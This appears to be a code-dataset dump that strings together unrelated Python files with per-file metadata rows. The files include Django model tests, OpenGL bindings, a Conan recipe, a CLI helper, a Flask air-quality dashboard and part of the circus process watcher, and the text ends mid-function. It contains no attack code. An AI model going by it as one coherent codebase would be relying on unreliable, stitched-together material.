def test_update(self, create_work_place_category):
work_place_category = create_work_place_category
work_place_category.name = "work place category name update"
work_place_category.save()
work_place_category_test = WorkPlaceCategory.objects.get(id=create_work_place_category.id)
assert work_place_category_test.name == "work place category name update"
def test_delete(self, create_work_place_category):
assert WorkPlaceCategory.objects.count() == 1
WorkPlaceCategory.objects.get(id=create_work_place_category.id).delete()
assert WorkPlaceCategory.objects.count() == 0
# test work_place_master
@pytest.mark.django_db
class TestWorkPlaceMaster:
def test_create(self, create_work_place_master):
assert WorkPlaceMaster.objects.count() == 1
def test_update(self, create_work_place_master):
work_place = create_work_place_master
work_place.name = "work place name"
work_place.save()
work_place_test = WorkPlaceMaster.objects.get(id=work_place.id)
assert work_place_test.name == "work place name"
def test_delete(self, create_work_place_master):
assert WorkPlaceMaster.objects.count() == 1
create_work_place_master.delete()
assert WorkPlaceMaster.objects.count() == 0
# test job_type_category
@pytest.mark.django_db
class TestJobTypeCategory:
def test_create(self, create_job_type_category):
assert JobTypeCategory.objects.count() == 1
def test_update(self, create_job_type_category):
job_type = create_job_type_category
job_type.name = "job name update"
job_type.save()
job_type_test = JobTypeCategory.objects.get(id=job_type.id)
assert job_type_test.name == "job name update"
def test_delete(self, create_job_type_category):
assert JobTypeCategory.objects.count() == 1
create_job_type_category.delete()
assert JobTypeCategory.objects.count() == 0
# test job_type_master
@pytest.mark.django_db
class TestJobTypeMaster:
def test_create(self, create_job_type_master):
assert JobTypeMaster.objects.count() == 1
def test_update(self, create_job_type_master):
job_type = create_job_type_master
job_type.name = "job type update"
job_type.save()
job_type_test = JobTypeMaster.objects.get(id=job_type.id)
assert job_type_test.name == "job type update"
def test_delete(self, create_job_type_master):
assert JobTypeMaster.objects.count() == 1
create_job_type_master.delete()
assert JobTypeMaster.objects.count() == 0
# test school_info_master
@pytest.mark.django_db
class TestSchoolInfoMaster:
def test_create(self, create_school_info_master):
assert SchoolInfoMaster.objects.count() == 1
def test_update(self, create_school_info_master):
school_info = create_school_info_master
school_info.name = "name update"
school_info.save()
school_info_test = SchoolInfoMaster.objects.get(id=school_info.id)
assert school_info_test.name == "name update"
def test_delete(self, create_school_info_master):
assert SchoolInfoMaster.objects.count() == 1
create_school_info_master.delete()
assert SchoolInfoMaster.objects.count() == 0
# test media
@pytest.mark.django_db
class TestMedia:
def test_create(self, create_media):
assert Media.objects.count() == 1
def test_update(self, create_media):
media = create_media
media.name = "name update"
media.save()
media_update = Media.objects.get(id=media.id)
assert media_update.name == "name update"
def test_delete(self, create_media):
assert Media.objects.count() == 1
create_media.delete()
assert Media.objects.count() == 0
# test Plan
@pytest.mark.django_db
class TestPlan:
def test_create(self, create_plan):
assert Plan.objects.count() == 1
def test_update(self, create_plan):
plan = create_plan
plan.name = "name update"
plan.save()
plan_test = Plan.objects.get(id=plan.id)
assert plan_test.name == "name update"
def test_delete(self, create_plan):
assert Plan.objects.count() == 1
create_plan.delete()
assert Plan.objects.count() == 0
# test type_auto_reply_message
@pytest.mark.django_db
class TestTypeAutoReplyMessage:
def test_create(self, create_type_auto_reply_message):
assert TypeAutoReplyMessage.objects.count() == 1
def test_update(self, create_type_auto_reply_message):
type_auto_reply_message = create_type_auto_reply_message
type_auto_reply_message.name = "type update"
type_auto_reply_message.save()
type_auto_reply_message_test = TypeAutoReplyMessage.objects.get(id=type_auto_reply_message.id)
assert type_auto_reply_message_test.name == "type update"
def test_delete(self, create_type_auto_reply_message):
assert TypeAutoReplyMessage.objects.count() == 1
create_type_auto_reply_message.delete()
assert TypeAutoReplyMessage.objects.count() == 0
| 33.941176
| 102
| 0.718515
| 6,358
| 0.918255
| 0
| 0
| 6,588
| 0.951473
| 0
| 0
| 586
| 0.084633
|
8bec7a78ef815c669108337b9955421ae8412b87
| 1,192
|
py
|
Python
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/ARB/get_program_binary.py
|
ShujaKhalid/deep-rl
|
99c6ba6c3095d1bfdab81bd01395ced96bddd611
|
[
"MIT"
] | 210
|
2016-04-09T14:26:00.000Z
|
2022-03-25T18:36:19.000Z
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/ARB/get_program_binary.py
|
ShujaKhalid/deep-rl
|
99c6ba6c3095d1bfdab81bd01395ced96bddd611
|
[
"MIT"
] | 72
|
2016-09-04T09:30:19.000Z
|
2022-03-27T17:06:53.000Z
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/ARB/get_program_binary.py
|
ShujaKhalid/deep-rl
|
99c6ba6c3095d1bfdab81bd01395ced96bddd611
|
[
"MIT"
] | 64
|
2016-04-09T14:26:49.000Z
|
2022-03-21T11:19:47.000Z
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_get_program_binary'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_get_program_binary',error_checker=_errors._error_checker)
GL_NUM_PROGRAM_BINARY_FORMATS=_C('GL_NUM_PROGRAM_BINARY_FORMATS',0x87FE)
GL_PROGRAM_BINARY_FORMATS=_C('GL_PROGRAM_BINARY_FORMATS',0x87FF)
GL_PROGRAM_BINARY_LENGTH=_C('GL_PROGRAM_BINARY_LENGTH',0x8741)
GL_PROGRAM_BINARY_RETRIEVABLE_HINT=_C('GL_PROGRAM_BINARY_RETRIEVABLE_HINT',0x8257)
@_f
@_p.types(None,_cs.GLuint,_cs.GLsizei,arrays.GLsizeiArray,arrays.GLuintArray,ctypes.c_void_p)
def glGetProgramBinary(program,bufSize,length,binaryFormat,binary):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLenum,ctypes.c_void_p,_cs.GLsizei)
def glProgramBinary(program,binaryFormat,binary,length):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLenum,_cs.GLint)
def glProgramParameteri(program,pname,value):pass
| 44.148148
| 119
| 0.833054
| 0
| 0
| 0
| 0
| 400
| 0.33557
| 0
| 0
| 281
| 0.235738
|
4733f343c64441b45c6474b08ce6fa31a64e3fde
| 176
|
py
|
Python
|
hazm/utils.py
|
perryyo/hazm
|
8596ea060f0c241eba7dece3ad1db6baa36439ed
|
[
"MIT"
] | null | null | null |
hazm/utils.py
|
perryyo/hazm
|
8596ea060f0c241eba7dece3ad1db6baa36439ed
|
[
"MIT"
] | null | null | null |
hazm/utils.py
|
perryyo/hazm
|
8596ea060f0c241eba7dece3ad1db6baa36439ed
|
[
"MIT"
] | 1
|
2018-12-09T05:16:06.000Z
|
2018-12-09T05:16:06.000Z
|
from os import path
data_path = path.join(path.dirname(__file__), 'data')
default_words = path.join(data_path, 'words.dat')
default_verbs = path.join(data_path, 'verbs.dat')
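# Illustrative check (not part of the original module): both .dat files are
# expected to ship inside the package's data directory.
#   assert path.isfile(default_words) and path.isfile(default_verbs)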
| 25.142857
| 53
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.159091
|
4735a6be395ffd4914453c63b7dd438db0593092
| 629
|
py
|
Python
|
parseridge/parser/training/callbacks/save_model_callback.py
|
jgontrum/parseridge
|
f87ef82a9468addeb09a91c3b5310db38840bf0f
|
[
"Apache-2.0"
] | 6
|
2019-10-06T23:00:29.000Z
|
2020-04-08T02:04:24.000Z
|
parseridge/parser/training/callbacks/save_model_callback.py
|
jgontrum/parseridge
|
f87ef82a9468addeb09a91c3b5310db38840bf0f
|
[
"Apache-2.0"
] | 2
|
2020-04-28T12:06:23.000Z
|
2020-04-28T13:30:03.000Z
|
parseridge/parser/training/callbacks/save_model_callback.py
|
jgontrum/parseridge
|
f87ef82a9468addeb09a91c3b5310db38840bf0f
|
[
"Apache-2.0"
] | 1
|
2019-12-23T00:53:38.000Z
|
2019-12-23T00:53:38.000Z
|
import os
from typing import Any, Optional
import torch
from parseridge.parser.modules.data_parallel import Module
from parseridge.parser.training.callbacks.base_callback import Callback
class SaveModelCallback(Callback):
_order = 5
def __init__(self, folder_path: Optional[str] = None):
self.folder = folder_path
if self.folder:
os.makedirs(folder_path, exist_ok=True)
def on_epoch_end(self, epoch: int, model: Module, **kwargs: Any) -> None:
if self.folder:
file_name = f"{self.folder}/epoch_{epoch}.torch"
torch.save(model.state_dict(), file_name)
| 28.590909
| 77
| 0.696343
| 437
| 0.694754
| 0
| 0
| 0
| 0
| 0
| 0
| 36
| 0.057234
|
4735d1f5a8954c473193826a0ee08dd64ab9a93e
| 35
|
py
|
Python
|
Training/pylens/__init__.py
|
Annarien/GravitationalLenses
|
c2606aacc62d2534fb199f5228dc21c0ea604251
|
[
"MIT"
] | null | null | null |
Training/pylens/__init__.py
|
Annarien/GravitationalLenses
|
c2606aacc62d2534fb199f5228dc21c0ea604251
|
[
"MIT"
] | null | null | null |
Training/pylens/__init__.py
|
Annarien/GravitationalLenses
|
c2606aacc62d2534fb199f5228dc21c0ea604251
|
[
"MIT"
] | null | null | null |
import massmodel, pylens, MassModels
| 17.5
| 34
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
473611358315db91be2c68a0523fa1b4712e6722
| 1,083
|
py
|
Python
|
conanfile.py
|
martinmoene/lest-conan-package
|
db0a1eda840e819edb0c1bb5dc4d8384d1a92c19
|
[
"MIT"
] | null | null | null |
conanfile.py
|
martinmoene/lest-conan-package
|
db0a1eda840e819edb0c1bb5dc4d8384d1a92c19
|
[
"MIT"
] | null | null | null |
conanfile.py
|
martinmoene/lest-conan-package
|
db0a1eda840e819edb0c1bb5dc4d8384d1a92c19
|
[
"MIT"
] | null | null | null |
from contextlib import closing
from tarfile import open as taropen
from urllib2 import urlopen
from conans import ConanFile
class lestConan(ConanFile):
name = "lest"
version = "1.26.0"
url = "https://github.com/martinmoene/lest-conan-package"
license = "Boost 1.0"
author = "Martin Moene (martin.moene@gmail.com)"
settings = None # header-only
    def build(self):
        pass  # header-only: nothing to build
def source(self):
url = "https://github.com/martinmoene/lest/archive/v{0}.tar.gz".format(self.version)
with closing(urlopen(url)) as dl:
with taropen(mode='r|gz', fileobj=dl) as archive:
archive.extractall()
def package(self):
self.copy(pattern="*.hpp", dst="include/lest", src="lest-{0}/include/lest".format(self.version))
# self.copy(pattern="*.hpp", dst="include/lest", src="lest-{0}".format(self.version))
def package_info(self):
self.cpp_info.includedirs = ['include/lest']
self.cpp_info.libdirs = []
self.cpp_info.resdirs = []
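# Illustrative usage sketch (assumed Conan 1.x workflow, not part of the recipe):
#   conan export . martinmoene/stable
# then require "lest/1.26.0@martinmoene/stable" from a consuming project.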
| 32.818182
| 104
| 0.644506
| 955
| 0.88181
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.348107
|
47364a3924f1597cca49227e92174ee485e954ae
| 555
|
py
|
Python
|
erp/migrations/0093_auto_20200922_0802.py
|
Foohx/acceslibre
|
55135e096f2ec4e413ff991f01c17f5e0d5925c0
|
[
"MIT"
] | 8
|
2020-07-23T08:17:28.000Z
|
2022-03-09T22:31:36.000Z
|
erp/migrations/0093_auto_20200922_0802.py
|
Foohx/acceslibre
|
55135e096f2ec4e413ff991f01c17f5e0d5925c0
|
[
"MIT"
] | 37
|
2020-07-01T08:47:33.000Z
|
2022-02-03T19:50:58.000Z
|
erp/migrations/0093_auto_20200922_0802.py
|
Foohx/acceslibre
|
55135e096f2ec4e413ff991f01c17f5e0d5925c0
|
[
"MIT"
] | 4
|
2021-04-08T10:57:18.000Z
|
2022-01-31T13:16:31.000Z
|
# Generated by Django 3.1.1 on 2020-09-22 06:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('erp', '0092_merge_20200916_1733'),
]
operations = [
migrations.AlterField(
model_name='accessibilite',
name='cheminement_ext_reperage_marches',
field=models.BooleanField(blank=True, choices=[(True, 'Oui'), (False, 'Non'), (None, 'Inconnu ou sans objet')], null=True, verbose_name='Repérage des marches ou de l’escalier'),
),
]
| 29.210526
| 189
| 0.641441
| 465
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 202
| 0.362007
|
4738887a5abd7d5e02db7c0d3385f50ba3f81899
| 8,290
|
py
|
Python
|
cli/cli.py
|
MustafaTheCoder/create-a-cli-tool
|
9f7c327927e22b390a58c8c8b599a59cad246f2e
|
[
"MIT"
] | 3
|
2021-09-27T10:35:24.000Z
|
2021-10-02T08:16:46.000Z
|
cli/cli.py
|
MustafaTheCoder/create-a-cli-tool
|
9f7c327927e22b390a58c8c8b599a59cad246f2e
|
[
"MIT"
] | 1
|
2021-09-22T15:44:30.000Z
|
2021-09-22T15:44:30.000Z
|
cli/cli.py
|
MustafaTheCoder/create-a-cli-tool
|
9f7c327927e22b390a58c8c8b599a59cad246f2e
|
[
"MIT"
] | 3
|
2021-09-21T05:19:42.000Z
|
2021-10-02T08:16:48.000Z
|
import asyncio
import sys
from typing import Any, Callable, List, Optional, Union
from .commands import Command
from .commands import CommandGroup as Group
from .errors import *
class CLI:
"""
    The CLI class itself; it represents your CLI.
Parameters
-----------
name: :class:`str`
The name of your CLI
no_welcome_message: :class:`bool`
Choose if you want to display a welcome message or not.
command_not_found_message: :class:`str`
Pick whatever error message you want to print out when a command is not found.
"""
def __init__(
self,
name: str,
no_welcome_message: bool = False,
command_not_found_message: str = "Command not found.",
) -> None:
self.name: str = str(name)
self.commands: List[Command] = [
Command(
name="help",
func=self.show_help,
description="Shows this message.",
)
]
self.no_welcome_message: bool = no_welcome_message
self.command_not_found_message: str = command_not_found_message
def command(
self,
name: Optional[str] = None,
description: Optional[str] = None,
        aliases: Optional[List[str]] = None,
) -> Callable[..., Any,]:
"""
Make a command for your cli.
Parameters
-----------
name: :class:`str`
            The name of the command. Defaults to the name of your function.
        description: :class:`str`
            The description of the command. Defaults to the function's doc.
        aliases: :class:`List[str]`
            A list of strings containing the names of the aliases you want.
"""
def decorator(
func: Callable[
...,
Any,
]
) -> Command:
if asyncio.iscoroutinefunction(func):
raise NoCorountines("Functions must not be coroutines.")
if not name:
cmd: Command = Command.from_function(func)
else:
cmd: Command = Command(name=name, func=func, description=description) # type: ignore
if cmd.name.count(" ") > 0:
raise NameHasSpaces("Command cannot have spaces.")
if cmd in self.commands:
raise CommandAlreadyExists(f"The command named {cmd.name} already exists.")
self.commands.append(cmd)
if aliases:
for alias in aliases:
self.commands.append(
Command(
name=alias,
func=func,
description=description,
)
)
return cmd
return decorator
def group(
self,
name: Optional[str] = None,
description: Optional[str] = None,
        aliases: Optional[List[str]] = None,
) -> Callable[..., Any,]:
"""
Make a command group for your cli.
Parameters
-----------
name: :class:`str`
            The name of the group. Defaults to the name of your function.
        description: :class:`str`
            The description of the group. Defaults to the function's doc.
        aliases: :class:`List[str]`
            A list of strings containing the names of the aliases you want.
"""
def decorator(
func: Callable[
...,
Any,
]
) -> Group:
if asyncio.iscoroutinefunction(func):
                raise NoCorountines("Functions must not be coroutines.")
if not name:
cmd: Group = Group.from_function(func)
else:
cmd: Group = Group(name=name, func=func, description=description) # type: ignore
if cmd.name.count(" ") > 0:
raise NameHasSpaces("Command cannot have spaces.")
if cmd in self.commands:
raise CommandAlreadyExists(f"The group named {cmd.name} already exists.")
self.commands.append(cmd)
if aliases:
for alias in aliases:
self.commands.append(
Group(
name=alias,
func=func,
description=description,
)
)
return cmd
return decorator
def run(
self,
interactive: bool = True,
) -> None:
"""
Run your cli.
Parameters
-----------
interactive: :class:`bool`
            Choose whether the CLI should be interactive; if set to False, you invoke it like ``python3 main.py command_name``.
"""
if interactive:
if not self.no_welcome_message:
print("Welcome to " + self.name)
args: List[str] = input(">>> ").split()
while args and args[0] not in (
"exit",
"quit",
):
cmd = self.get_command(args[0])
if not cmd:
print(self.command_not_found_message)
args = input(">>> ").split()
elif type(cmd) == Command:
try:
cmd._func(*args[1:])
                    except TypeError:
cmd._func()
args: List[str] = input(">>> ").split() # type: ignore
elif type(cmd) == Group:
for subcmd in cmd.children: # type: ignore
if subcmd.name == args[0]:
try:
subcmd._func(*args[2:])
except TypeError as e:
print(e)
args: List[str] = input(">>> ").split() # type: ignore
else:
try:
cmd._func(*args[1:])
except TypeError:
cmd._func()
args: List[str] = input(">>> ").split() # type: ignore
else:
cmd = self.get_command(sys.argv[1]) # type: ignore
if not cmd:
print(self.command_not_found_message)
return
if type(cmd) == Command:
try:
cmd._func(*sys.argv[2:])
except TypeError:
cmd._func()
else:
for subcmd in cmd: # type: ignore
if subcmd.name == sys.argv[2]:
try:
subcmd._func(*sys.argv[2:])
except TypeError:
subcmd._func()
break
else:
try:
cmd._func(*sys.argv[1:])
except TypeError:
cmd._func()
def get_command(self, name: str) -> Union[Group, Command]: # type: ignore
for command in self.commands:
if command.name == name:
return command # type: ignore
def remove_command(
self,
name: str,
) -> None:
"""
Remove a command.
Parameters
-----------
name: :class:`str`
The name of the command that you want to remove.
"""
for cmd in self.commands:
if cmd.name == name:
self.commands.remove(cmd)
break
def show_help(
self,
) -> None:
for cmd in self.commands:
print(f"{cmd.name} - {cmd.description}")
def add_shard(
self,
shard,
):
"""
Add a shard to the cli.
Parameters
-----------
shard: :class:`cli.cli.ext.shard.Shard`
The shard you want to add
"""
shard = shard
_shard_cmds = shard._inject()
for cmd in _shard_cmds:
self.commands.append(cmd)
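# Illustrative usage sketch (hypothetical script, not part of this module):
#
#   from cli import CLI
#
#   app = CLI(name="demo")
#
#   @app.command(name="greet", description="Say hello.")
#   def greet(who="world"):
#       print(f"Hello, {who}!")
#
#   app.run()  # starts the interactive ">>>" prompt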
| 30.932836
| 124
| 0.458987
| 8,108
| 0.978046
| 0
| 0
| 0
| 0
| 0
| 0
| 2,305
| 0.278046
|
47391c58cb36718e353c6d24ef9b6c3dc10d34e8
| 230
|
py
|
Python
|
propertiesTemplate/Fields/FieldTester.py
|
HenShalom/tableTransform
|
ede5c9ed3ecb32f74712778a6746b03773ac28ef
|
[
"Apache-2.0"
] | null | null | null |
propertiesTemplate/Fields/FieldTester.py
|
HenShalom/tableTransform
|
ede5c9ed3ecb32f74712778a6746b03773ac28ef
|
[
"Apache-2.0"
] | null | null | null |
propertiesTemplate/Fields/FieldTester.py
|
HenShalom/tableTransform
|
ede5c9ed3ecb32f74712778a6746b03773ac28ef
|
[
"Apache-2.0"
] | 2
|
2019-11-20T02:47:23.000Z
|
2019-11-20T02:47:23.000Z
|
from propertiesTemplate.Fields.BasicField import BasicField
from propertiesTemplate.Fields.ConstField import ConstField
def get_field(value):
if value[0] == '@':
return BasicField(value)
return ConstField(value)
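# Example (illustrative): values prefixed with '@' resolve to a field lookup,
# anything else becomes a constant:
#   get_field('@name') -> BasicField('@name')
#   get_field('fixed') -> ConstField('fixed')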
| 25.555556
| 59
| 0.76087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.013043
|
473931c03e87e8ad7ec18f92b6ba042e2eddadd3
| 494
|
py
|
Python
|
Alice/Sorting/selection_sort.py
|
sandeepm96/cormen-algos
|
9154f6ce9cb0c318bc0d6ecaa13676d080985cec
|
[
"MIT"
] | 1
|
2017-09-15T13:34:19.000Z
|
2017-09-15T13:34:19.000Z
|
Alice/Sorting/selection_sort.py
|
sandeepm96/cormen-algos
|
9154f6ce9cb0c318bc0d6ecaa13676d080985cec
|
[
"MIT"
] | null | null | null |
Alice/Sorting/selection_sort.py
|
sandeepm96/cormen-algos
|
9154f6ce9cb0c318bc0d6ecaa13676d080985cec
|
[
"MIT"
] | null | null | null |
class SelectionSort:
def __init__(self,array):
self.array = array
def result(self):
n = len(self.array)
for i in range(n):
minimum = i
for j in range(i+1,n):
if self.array[minimum] > self.array[j]:
minimum = j
self.array[i],self.array[minimum] = self.array[minimum],self.array[i]
return self.array
test = list(map(int, input().split()))
t = SelectionSort(test)
print(t.result())
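# Example (illustrative): entering "5 2 4 6 1 3" at the prompt prints
# [1, 2, 3, 4, 5, 6].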
| 29.058824
| 81
| 0.544534
| 409
| 0.827935
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.006073
|
4739439933f695399a93b2006266d661c9ac6918
| 1,521
|
py
|
Python
|
sprint/DS-Unit-3-Sprint-3-Productization-and-Cloud/sprint/aq_dashboard.py
|
ndow33/DS-Unit-3-Sprint-3-Productization-and-Cloud
|
17ebfc34991649580fce24dae5c0a7933f5b3095
|
[
"MIT"
] | null | null | null |
sprint/DS-Unit-3-Sprint-3-Productization-and-Cloud/sprint/aq_dashboard.py
|
ndow33/DS-Unit-3-Sprint-3-Productization-and-Cloud
|
17ebfc34991649580fce24dae5c0a7933f5b3095
|
[
"MIT"
] | null | null | null |
sprint/DS-Unit-3-Sprint-3-Productization-and-Cloud/sprint/aq_dashboard.py
|
ndow33/DS-Unit-3-Sprint-3-Productization-and-Cloud
|
17ebfc34991649580fce24dae5c0a7933f5b3095
|
[
"MIT"
] | null | null | null |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import openaq
import requests
# connects to the api
api = openaq.OpenAQ()
# initialize the app
APP = Flask(__name__)
# configure the database
APP.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
DB = SQLAlchemy(APP)
# define a function that returns a list of [utc_datetime, value] pairs
def tuple_list():
    status, body = api.measurements(city='Los Angeles', parameter='pm25')
    test_list = []
    for result in body["results"]:
        test_list.append([result['date']['utc'], result['value']])
    return test_list
# Base route
@APP.route('/')
def root():
# uses the function defined above to return a list of tuples as a string
test = tuple_list()
return str(test)
class Record(DB.Model):
id = DB.Column(DB.Integer, primary_key=True)
datetime = DB.Column(DB.String(25))
value = DB.Column(DB.Float, nullable=False)
    def __repr__(self):
        return '<Record {} {}>'.format(self.datetime, self.value)
@APP.route('/refresh')
def refresh():
"""Pull fresh data from Open AQ and replace existing data."""
DB.drop_all()
DB.create_all()
    # Get data from OpenAQ, make Record objects with it, and add to the db
    for utc_date, value in tuple_list():
        DB.session.add(Record(datetime=utc_date, value=value))
    DB.session.commit()
return 'Data refreshed!'
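# Local run sketch (assumed setup): point Flask's CLI at this module, e.g.
#   FLASK_APP=aq_dashboard:APP flask run
# then visit / for the latest measurements and /refresh to rebuild the table.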
| 27.160714
| 76
| 0.663379
| 254
| 0.166995
| 0
| 0
| 462
| 0.303748
| 0
| 0
| 531
| 0.349112
|
47398e6b8466cbdbb207c2820f76f1b99f1321a9
| 21,273
|
py
|
Python
|
circus/watcher.py
|
j4mie/circus
|
d026b692cc7c4ec57bed7aaa671fce561adc0f3d
|
[
"Apache-2.0"
] | 1
|
2015-11-05T11:44:54.000Z
|
2015-11-05T11:44:54.000Z
|
circus/watcher.py
|
j4mie/circus
|
d026b692cc7c4ec57bed7aaa671fce561adc0f3d
|
[
"Apache-2.0"
] | null | null | null |
circus/watcher.py
|
j4mie/circus
|
d026b692cc7c4ec57bed7aaa671fce561adc0f3d
|
[
"Apache-2.0"
] | null | null | null |
import copy
import errno
import os
import signal
import time
from psutil import STATUS_ZOMBIE, STATUS_DEAD, NoSuchProcess
from zmq.utils.jsonapi import jsonmod as json
from circus.process import Process, DEAD_OR_ZOMBIE, UNEXISTING
from circus import logger
from circus import util
from circus.stream import get_pipe_redirector, get_stream
from circus.util import parse_env
class Watcher(object):
"""
Class managing a list of processes for a given command.
Options:
- **name**: name given to the watcher. Used to uniquely identify it.
- **cmd**: the command to run. May contain *$WID*, which will be
replaced by **wid**.
- **args**: the arguments for the command to run. Can be a list or
      a string. If **args** is a string, it's split using
:func:`shlex.split`. Defaults to None.
- **numprocesses**: Number of processes to run.
- **working_dir**: the working directory to run the command in. If
not provided, will default to the current working directory.
- **shell**: if *True*, will run the command in the shell
environment. *False* by default. **warning: this is a
security hazard**.
- **uid**: if given, is the user id or name the command should run
with. The current uid is the default.
- **gid**: if given, is the group id or name the command should run
with. The current gid is the default.
- **send_hup**: if True, a process reload will be done by sending
the SIGHUP signal. Defaults to False.
- **env**: a mapping containing the environment variables the command
will run with. Optional.
- **rlimits**: a mapping containing rlimit names and values that will
be set before the command runs.
- **stdout_stream**: a mapping that defines the stream for
the process stdout. Defaults to None.
Optional. When provided, *stdout_stream* is a mapping containing up to
three keys:
- **class**: the stream class. Defaults to
`circus.stream.FileStream`
- **filename**: the filename, if using a FileStream
- **refresh_time**: the delay between two stream checks. Defaults
to 0.3 seconds.
This mapping will be used to create a stream callable of the specified
class.
Each entry received by the callable is a mapping containing:
- **pid** - the process pid
- **name** - the stream name (*stderr* or *stdout*)
- **data** - the data
- **stderr_stream**: a mapping that defines the stream for
the process stderr. Defaults to None.
Optional. When provided, *stderr_stream* is a mapping containing up to
three keys:
- **class**: the stream class. Defaults to `circus.stream.FileStream`
- **filename**: the filename, if using a FileStream
- **refresh_time**: the delay between two stream checks. Defaults
to 0.3 seconds.
This mapping will be used to create a stream callable of the specified
class.
Each entry received by the callable is a mapping containing:
- **pid** - the process pid
- **name** - the stream name (*stderr* or *stdout*)
- **data** - the data
- **stream_backend** -- the backend that will be used for the streaming
process. Can be *thread* or *gevent*. When set to *gevent* you need
to have *gevent* and *gevent_zmq* installed. (default: thread)
- **priority** -- integer that defines a priority for the watcher. When
the Arbiter do some operations on all watchers, it will sort them
with this field, from the bigger number to the smallest.
(default: 0)
- **singleton** -- If True, this watcher has a single process.
(default:False)
    - **use_sockets** -- XXX
- **copy_env** -- If True, the environment in which circus had been
run will be reproduced for the workers.
- **options** -- extra options for the worker. All options
found in the configuration file for instance, are passed
in this mapping -- this can be used by plugins for watcher-specific
options.
"""
def __init__(self, name, cmd, args=None, numprocesses=1, warmup_delay=0.,
working_dir=None, shell=False, uid=None, max_retry=5,
gid=None, send_hup=False, env=None, stopped=True,
graceful_timeout=30., prereload_fn=None,
rlimits=None, executable=None, stdout_stream=None,
stderr_stream=None, stream_backend='thread', priority=0,
singleton=False, use_sockets=False, copy_env=False,
**options):
self.name = name
self.use_sockets = use_sockets
self.res_name = name.lower().replace(" ", "_")
self.numprocesses = int(numprocesses)
self.warmup_delay = warmup_delay
self.cmd = cmd
self.args = args
self._process_counter = 0
self.stopped = stopped
self.graceful_timeout = graceful_timeout
self.prereload_fn = prereload_fn
self.executable = None
self.stream_backend = stream_backend
self.priority = priority
self.stdout_stream_conf = copy.copy(stdout_stream)
self.stderr_stream_conf = copy.copy(stderr_stream)
self.stdout_stream = get_stream(self.stdout_stream_conf)
self.stderr_stream = get_stream(self.stderr_stream_conf)
self.stdout_redirector = self.stderr_redirector = None
self.max_retry = max_retry
self._options = options
self.singleton = singleton
self.copy_env = copy_env
if singleton and self.numprocesses not in (0, 1):
raise ValueError("Cannot have %d processes with a singleton "
" watcher" % self.numprocesses)
self.optnames = (("numprocesses", "warmup_delay", "working_dir",
"uid", "gid", "send_hup", "shell", "env", "max_retry",
"cmd", "args", "graceful_timeout", "executable",
"use_sockets", "priority", "copy_env",
"singleton", "stdout_stream_conf", "stderr_stream_conf")
+ tuple(options.keys()))
if not working_dir:
# working dir hasn't been set
working_dir = util.get_working_dir()
self.working_dir = working_dir
self.processes = {}
self.shell = shell
self.uid = uid
self.gid = gid
if self.copy_env:
self.env = os.environ.copy()
if env is not None:
self.env.update(env)
else:
self.env = env
self.rlimits = rlimits
self.send_hup = send_hup
self.sockets = self.evpub_socket = None
def _create_redirectors(self):
if self.stdout_stream:
if (self.stdout_redirector is not None and
self.stdout_redirector.running):
self.stdout_redirector.kill()
self.stdout_redirector = get_pipe_redirector(self.stdout_stream,
backend=self.stream_backend)
else:
self.stdout_redirector = None
if self.stderr_stream:
if (self.stderr_redirector is not None and
self.stderr_redirector.running):
self.stderr_redirector.kill()
self.stderr_redirector = get_pipe_redirector(self.stderr_stream,
backend=self.stream_backend)
else:
self.stderr_redirector = None
@classmethod
def load_from_config(cls, config):
if 'env' in config:
config['env'] = parse_env(config['env'])
return cls(name=config.pop('name'), cmd=config.pop('cmd'), **config)
@util.debuglog
def initialize(self, evpub_socket, sockets):
self.evpub_socket = evpub_socket
self.sockets = sockets
def __len__(self):
return len(self.processes)
def notify_event(self, topic, msg):
"""Publish a message on the event publisher channel"""
json_msg = json.dumps(msg)
if isinstance(json_msg, unicode):
json_msg = json_msg.encode('utf8')
if isinstance(self.res_name, unicode):
name = self.res_name.encode('utf8')
else:
name = self.res_name
multipart_msg = ["watcher.%s.%s" % (name, topic), json.dumps(msg)]
if not self.evpub_socket.closed:
self.evpub_socket.send_multipart(multipart_msg)
@util.debuglog
def reap_process(self, pid, status):
"""ensure that the process is killed (and not a zombie)"""
process = self.processes.pop(pid)
# get return code
if os.WIFSIGNALED(status):
retcode = os.WTERMSIG(status)
# process exited using exit(2) system call; return the
# integer exit(2) system call has been called with
elif os.WIFEXITED(status):
retcode = os.WEXITSTATUS(status)
else:
# should never happen
raise RuntimeError("Unknown process exit status")
# if the process is dead or a zombie try to definitely stop it.
if retcode in (STATUS_ZOMBIE, STATUS_DEAD):
process.stop()
logger.debug('reaping process %s [%s]' % (pid, self.name))
self.notify_event("reap", {"process_pid": pid, "time": time.time()})
@util.debuglog
def reap_processes(self):
"""Reap all the processes for this watcher.
"""
if self.stopped:
logger.debug('do not reap processes as the watcher is stopped')
return
while True:
try:
# wait for completion of all the childs of circus, if it
# pertains to this watcher. Call reap on it.
pid, status = os.waitpid(-1, os.WNOHANG)
if not pid:
return
if pid in self.processes:
self.reap_process(pid, status)
if self.stopped:
logger.debug('watcher have been stopped, exit the loop')
return
except OSError as e:
if e.errno == errno.EAGAIN:
time.sleep(0.001)
continue
elif e.errno == errno.ECHILD:
return
else:
raise
@util.debuglog
def manage_processes(self):
""" manage processes
"""
if self.stopped:
return
if len(self.processes) < self.numprocesses:
self.spawn_processes()
processes = self.processes.values()
processes.sort()
while len(processes) > self.numprocesses:
